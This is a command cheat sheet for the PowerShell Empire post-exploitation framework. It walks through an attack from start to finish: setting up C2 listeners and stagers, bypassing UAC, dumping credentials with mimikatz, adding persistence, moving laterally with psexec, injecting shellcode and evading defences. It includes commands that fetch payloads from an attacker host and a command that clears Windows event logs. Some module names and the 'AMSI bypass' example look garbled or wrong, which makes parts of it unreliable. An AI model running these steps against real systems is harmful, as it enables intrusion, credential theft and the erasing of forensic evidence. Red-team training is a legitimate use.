
PowerShell Empire

PowerShell Empire is a pure PowerShell post-exploitation framework. Deploy agents, execute commands, escalate privileges, and extract data from Windows targets without dropping binaries.

Installation

Linux

# Clone repository
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire

# Install dependencies
python3 -m pip install -r requirements/base.txt

# Run setup
python3 empire

# Or use Docker
docker run -it bc-security/empire:latest

macOS

# Homebrew
brew install empire

# Or from source
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
python3 setup.py install

Windows

# PowerShell (not PowerShell 7)
# Download from GitHub
# https://github.com/BC-SECURITY/Empire

# Run server
python empire

Basic Operations

Start Empire Server

# Start server
python3 empire

# On port 5000 (default)
# Open browser to localhost:5000

REST API (Alternative)

# Use REST API instead of web UI
curl -X GET http://localhost:1337/api/version

# Generate listener
curl -X POST http://localhost:1337/api/listeners \
  -H "Authorization: Bearer token" \
  -d '{...listener config...}'

Listeners & Stagers

Create HTTP Listener

# In Empire CLI:
listeners
uselistener http
set Port 8080
set Host http://192.168.1.10:8080
execute

# View listeners
listeners

Create HTTPS Listener

# For encrypted C2
listeners
uselistener http
set Host https://192.168.1.10:443
set Port 443
set CertPath /path/to/cert.pem
set KeyPath /path/to/key.pem
execute

Other Listener Types

# Available listeners
listeners

# Common listeners:
# - http: HTTP listener
# - https: HTTPS listener
# - meterpreter: Meterpreter listener
# - redirector: HTTP redirector
# - dohlhttpproxy: Dohlhttpproxy

Generate Stagers

# Generate PowerShell stager
usestager windows/launcher_bat
set Listener http
execute

# Generate other stagers:
usestager windows/launcher_hta
usestager windows/launcher_vbs
usestager windows/launcher_dll
usestager windows/launcher_ps

# Get stager code to copy/paste

Agent Management

Interact with Agents

# List agents
agents

# Interact with agent
interact agent_name

# Execute command
shell whoami
shell ipconfig /all
shell tasklist

# Get system info
shell systeminfo

# Network commands
shell netstat -an
shell arp -a
shell nslookup example.com

Agent Commands

# Within agent session
whoami
pwd
cd c:\Windows
ls
cat filename.txt

# Process management
get-process
Stop-Process -Id 1234
Start-Process -FilePath notepad.exe

# Registry operations
Get-Item HKLM:\Software\...
Set-ItemProperty ...

# Network commands
Test-Connection 192.168.1.1
Get-NetIPConfiguration

Modules

Common Modules

# List modules
usemodule

# Privilege Escalation
usemodule privesc/bypassuac
usemodule privesc/bypassuac_eventvwr
usemodule privesc/bypassuac_fodhelper
usemodule privesc/getsystem

# Credential Harvesting
usemodule collection/get_browser_data
usemodule collection/get_clipboard
usemodule collection/mimikatz
usemodule collection/session_gister

# Persistence
usemodule persistence/registry_add
usemodule persistence/elevated_registry_add
usemodule persistence/scheduled_task
usemodule persistence/userland_registry

# Lateral Movement
usemodule lateral_movement/invoke_psexec
usemodule lateral_movement/invoke_wmi
usemodule lateral_movement/invoke_ssh

# Recon
usemodule situational_awareness/network/powerview
usemodule situational_awareness/host/get_os_version
usemodule situational_awareness/host/anti_virus_product
usemodule situational_awareness/host/firewall_rules

Execute Module

# Select module
usemodule collection/mimikatz

# Set options
set Agent agent_name
set Listener http

# Execute
execute

# View output
agents
interact agent_name
# Output shown here

Common Workflows

Initial Exploitation

# 1. Create listener
listeners
uselistener http
execute

# 2. Generate stager
usestager windows/launcher_bat
set Listener http
execute

# 3. Get PowerShell code from stager
# Copy and paste onto target

# 4. Monitor for agent callback
agents

# 5. Interact with agent
interact agent_name

Post-Exploitation

# 1. Privilege Escalation
usemodule privesc/bypassuac
set Agent agent_name
execute

# 2. Credential Dumping
usemodule collection/mimikatz
set Agent agent_name
execute

# 3. Establish Persistence
usemodule persistence/registry_add
set Agent agent_name
execute

# 4. Lateral Movement
usemodule lateral_movement/invoke_psexec
set Agent agent_name
set Target 192.168.1.101
set Username admin
set Password password
execute

Advanced Techniques

Obfuscation

# Use the encoded launcher
# Empire generates obfuscated PowerShell

# In agent:
shell Invoke-Obfuscation
shell Get-Content shell.ps1 | Invoke-Obfuscation

Custom Modules

# Create custom module
# Place in: /path/to/empire/lib/modules/

# Example structure:
class Module:
    options = {
        'Agent': {'Required': True, ...},
        'Option1': {'Required': False, ...}
    }

    def execute(self):
        # Execute code
        pass

File Transfer

# Upload file
shell Invoke-WebRequest -Uri http://192.168.1.10/file.exe -OutFile C:\file.exe

# Download file
shell (New-Object Net.WebClient).DownloadFile('http://192.168.1.10/file.exe', 'C:\file.exe')

# Base64 encode for transfer
shell [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\file.exe'))

Reverse Engineering

# Retrieve agent config
cat /path/to/agent/config

# Modify stager options
# Edit listener IP, port, URI

# Generate backdoor stager
# usestager windows/launcher_ps
# Modify to run on startup

Defense Evasion

Anti-Virus Evasion

# Test AMSI bypass
Set-Content -Path test.ps1 -Value 'write-host test'
Get-Content test.ps1 | powershell.exe -nop

# Use constrained language mode bypass
$ExecutionContext.SessionState.LanguageMode = 'FullLanguage'

Process Injection

# Use process injection module
usemodule payload/inject_shellcode
set Agent agent_name
set Shellcode raw_shellcode
set ProcessID 1234
execute

Living Off The Land

# Use legitimate Windows tools
# Empire leverages:
# - certutil
# - bitsadmin
# - mshta
# - cscript/wscript
# - regsvcs
# - regasm

Troubleshooting

Agent Connection Issues

# Check listener status
listeners

# Verify listener port is accessible
netstat -an | grep 8080

# Check firewall rules
Get-NetFirewallRule -DisplayName "Allow HTTP"

# Test connectivity
Test-NetConnection -ComputerName 192.168.1.10 -Port 8080

Module Failures

# Check module syntax
usemodule module_name
options

# Verify agent has permissions
shell whoami
shell [Security.Principal.WindowsIdentity]::GetCurrent()

# Test in isolated environment first

Stager Issues

# Verify stager output
usestager windows/launcher_ps
# Copy generated code
# Test in PowerShell
# Verify execution context (user, admin)

Security Considerations

  • Only use on authorized targets
  • Remove all agents and persistence post-engagement
  • Use encrypted listeners (HTTPS)
  • Document all activities
  • Clean logs: Get-EventLog -List | Clear-EventLog
  • Secure C2 infrastructure
  • Use aliases and OPSEC

Useful PowerShell Commands

# System enumeration
Get-WmiObject -Class Win32_ComputerSystem
Get-WmiObject -Class Win32_OperatingSystem
Get-Process
Get-Service

# Network enumeration
Get-NetIPAddress
Get-NetIPConfiguration
Get-DnsClientCache
Get-NetTCPConnection

# User enumeration
Get-LocalUser
Get-LocalGroup
net user
net localgroup

# Firewall enumeration
Get-NetFirewallProfile
Get-NetFirewallRule

# Scheduled tasks
Get-ScheduledTask
Get-ScheduledTaskInfo

Resources


Last updated: 2025-03-30